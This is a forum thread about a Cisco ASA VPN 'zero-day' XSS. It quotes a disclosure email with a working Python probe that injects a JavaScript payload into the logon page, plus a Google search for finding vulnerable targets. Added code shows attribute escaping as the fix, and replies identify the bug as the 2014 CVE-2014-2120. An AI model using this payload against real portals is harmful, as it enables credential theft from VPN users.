zero day exploit for ASAs, the fun ain't over yet

Started by dlots, February 18, 2016, 03:24:48 PM


dlots

So my company blocks this page, so I can't check it out much, but this is the email that was forwarded to me:

Subject: [FD] Cisco ASA VPN - Zero Day Exploit
Message-ID: <CANYkwVJZ7B8tzM5t8KWRV+zCnb65JY0+TKV7VYQ4XSBRPcLvQw@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8

# Exploit author: Juan Sacco - jsacco@exploitpack.com
# Affected program: Cisco ASA VPN Portal - Zero Day
# Cisco ASA VPN is prone to an XSS on the password recovery page.
# This vulnerability can be used by an attacker to capture other users' credentials.
# The password recovery form fails to properly filter the hidden input fields.
#
# This Zero Day exploit has been developed and discovered by Juan Sacco.
# Exploit Pack - Team http://exploitpack.com
#
# Release Dates:
# Reported to Cisco PSIRT Feb 4/2016
# Cisco Dev Team working on a fix Feb 15/2016
# Cisco PSIRT reports a CVE Feb 15/2016
# Exploit Pack discloses the bug Feb 15/2016
# Disclosure of the Exploit Feb 16/2016
#
# Look for vulnerable targets here:
# https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
# More than 18.000 results in Google only

import sys
import ssl
import http.client


def run(target, port, payload="alert(1)"):
    # "payload" is where your custom JS agent code goes
    vulnerable_url = (
        "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle="
        "&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d"
        + payload +
        "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
    )
    crafted_request = vulnerable_url
    try:
        # Start the connection; the certificate is not verified, matching
        # the behaviour of the original httplib-based script
        connection = http.client.HTTPSConnection(
            target, port, context=ssl._create_unverified_context())
        connection.request("GET", crafted_request)
        response = connection.getresponse()
        print("Server status response:", response.status, response.reason)
        data = response.read().decode("utf-8", "replace")
        vulnerable = "Target is not vulnerable"
        # Find the injection in the response
        for line in data.splitlines():
            if 'juansacco\\"' in line:
                vulnerable = "Target is vulnerable"
        print("Result of the test:", vulnerable)
        connection.close()
    except Exception as e:
        print("Exploit connection closed " + str(e))


if __name__ == "__main__":
    print("Cisco VPN ASA Exploit - Zero Day")
    print("################################")
    print("Author: Juan Sacco - jsacco@exploitpack.com")
    try:
        target = sys.argv[1]
        port = int(sys.argv[2])
    except (IndexError, ValueError):
        sys.exit("Usage: %s <target> <port>" % sys.argv[0])
    run(target, port)

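The username that the forwarded script injects, decoded and run against a minimal attribute-escaping check, as an added example that is not part of the original post or of Exploit Pack's code. The two render functions are a hypothetical stand-in for a page that echoes the username into a hidden <input> (an assumption about the portal template, used only to illustrate the bug class the advisory names: a quote that closes the value attribute and lets the rest of the string become new attributes). build_probe_url rebuilds the request path the script sends using urllib instead of string concatenation, and injected_attributes parses a response fragment to report which event-handler or accesskey attributes actually landed on an <input> tag.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode, quote

# The username the script above sends, URL-decoded. Constructed here from the
# query string in the script; everything after the closing quote is meant to
# land inside the <input> tag as new attributes.
INJECTED_USERNAME = 'juansacco" accesskey=X onclick=alert(1) sacco'


def build_probe_url(payload="alert(1)"):
    """Rebuild the request path the script sends, for a chosen JS payload.

    Same parameters and order as the script; the trailing "&password_"
    fragment of the original is left off because it is an incomplete name.
    """
    params = [
        ("reason", "2"), ("a0", "63"), ("a1", ""), ("a2", ""), ("a3", "0"),
        ("next", ""), ("auth_handle", ""), ("status", "0"),
        ("username", 'juansacco" accesskey=X onclick=%s sacco' % payload),
        ("password_min", "0"), ("state", ""), ("tgroup", ""),
        ("serverType", "0"),
    ]
    return "/+CSCOE+/logon.html?" + urlencode(params, quote_via=quote)


def render_hidden_vulnerable(username):
    """Hypothetical template that echoes the username into a hidden field
    without attribute escaping: the bug class the advisory describes."""
    return '<input type="hidden" name="username" value="%s">' % username


def render_hidden_fixed(username):
    """Same field with HTML attribute escaping; the quote can no longer close
    the value attribute, so no new attributes can be smuggled in."""
    return ('<input type="hidden" name="username" value="%s">'
            % html.escape(username, quote=True))


class _InputAttributes(HTMLParser):
    """Collect the attribute dict of every <input> tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def injected_attributes(fragment):
    """Return event-handler and accesskey attributes found on <input> tags.

    A reflected username that breaks out of value="..." shows up here as
    extra attributes; a properly escaped one yields an empty dict.
    """
    parser = _InputAttributes()
    parser.feed(fragment)
    parser.close()
    found = {}
    for attrs in parser.inputs:
        for name, value in attrs.items():
            if name.startswith("on") or name == "accesskey":
                found[name] = value
    return found


if __name__ == "__main__":
    print("probe path:", build_probe_url())
    for label, render in (("vulnerable", render_hidden_vulnerable),
                          ("fixed", render_hidden_fixed)):
        page = render(INJECTED_USERNAME)
        print("%-10s %s" % (label, page))
        print("           injected attributes:", injected_attributes(page))
```

Run stand-alone, the vulnerable rendering reports both onclick and accesskey on the input, while the escaped rendering reports none. The same injected_attributes function can be fed the body of a real logon.html response to see whether the reflected username became attributes, which is a more direct check than the script's search for a backslash-escaped quote.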

deanwebb

Paaaaaaaaaaaaaaaaaaaatch those ASAs running VPNs!
Take a baseball bat and trash all the routers, shout out "IT'S A NETWORK PROBLEM NOW, SUCKERS!" and then peel out of the parking lot in your Ferrari.
"The world could perish if people only worked on things that were easy to handle." -- Vladimir Savchenko
Вопросы есть? Вопросов нет! | BCEB: Belkin Certified Expert Baffler | "Plan B is Plan A with an element of panic." -- John Clarke
Accounting is architecture, remember that!
Air gaps are high-latency Internet connections.

dlots

It's a Zero day, I don't think there is a patch yet :-(

dlots

Apparently this isn't really a 0-day; it's from 2014 or so.

Otanx

Probably this one from 2013 - https://tools.cisco.com/security/center/viewAlert.x?alertId=30214

Juan Sacco is a pretty good researcher. He has done some talks at big conferences, so I wonder what is going on here. If it was a new XSS that is a 0-day, I would expect to see more coverage about it.

-Otanx



icecream-guy

Search on "Cisco PSIRT Feb 4/2016".

The first link is here:
https://securityintelligence.com/news/danger-on-the-perimeter-about-the-cisco-asa-vulnerability/

click on the Cisco ASA Alert in that page and the reference is

Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability

so my quick google yields results that we've known about for a few days.

I could be wrong though.

Hitting up AS now..

My Moral Fibers have been cut.

icecream-guy

Quote from: ristau5741 on February 19, 2016, 08:07:35 AM
Hitting up AS now..

This is not a new vulnerability. It was fixed and previously disclosed in 2014 and is just assigned CVE-2014-2120:

https://tools.cisco.com/security/center/viewAlert.x?alertId=33406

My Moral Fibers have been cut.